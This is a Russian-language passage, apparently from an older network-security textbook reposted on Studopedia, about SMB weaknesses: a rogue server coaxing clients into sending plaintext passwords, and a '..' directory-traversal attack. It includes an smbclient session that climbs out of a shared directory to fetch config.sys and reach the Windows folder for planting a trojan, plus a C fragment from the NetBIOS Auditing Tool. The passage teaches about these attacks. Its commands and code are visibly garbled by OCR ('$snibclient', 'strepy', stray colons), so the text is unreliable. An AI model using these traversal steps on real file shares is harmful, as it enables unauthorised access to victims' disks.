Студопедия.Орг Главная | Случайная страница | Контакты | Мы поможем в написании вашей работы!  
 

Атаке, как указание клиенту передавать пароль в открытом виде, потому что



Сервер якобы не поддерживает зашифрованные пароли. Естественно, роль

Сервера здесь выполняет ложный сервер злоумышленника (см. главу 3).

Из-за поддержки устаревших с точки зрения безопасности сетевых решений SMB

Может быть подвержен атаке на получение доступа ко всему диску, если у

Злоумышленника есть права только на его часть (каталог). Для этого

взломщику достаточно указать имя каталога через ".." $snibclient

\\\\VICTIM\\SOME_DIR -n TRUSTME -m LANMAN2 -U HACKER -1 194.94.94.94

smb: \" dir suit): \" cd..

smb: \..\" dir

smb: \..\"cd \..\..

smb:\..\..\"dir

smb: \..\..\" get config.sys -

smb; \..\..\" cd windows

smb: \..\..\windows\"

Далее злоумышленник может поместить в системный каталог Windows, например,

"троянского" коня. Первоначальная реакция Microsoft: "Samba -это

неправильный клиент, и он не должен быть использован".

Аналогичные попытки делает и NAT (NetBIOS Auditing Tool) -

Распространенное средство анализа безопасности для Windows-сетей. Вот

фрагмент его исходного текста:

strcpy(cur_dir, "..\\*.*"):

Do_dir (inbuf, outbuf, cur_dir, fattr, cfflp_stash, False);

tested_stash = 0:

strcpy(cur_dir, "\\..\\*.*");

do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False):

tested_stash = 0;

strepy (cur_dir, "...\\*.*"),

Do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False);

tested_stash = 0;

strcpy (cur_dir, ".\\...\\*. *");





Дата публикования: 2014-11-04; Прочитано: 303 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!



studopedia.org - Студопедия.Орг - 2014-2024 год. Студопедия не является автором материалов, которые размещены. Но предоставляет возможность бесплатного использования (0.006 с)...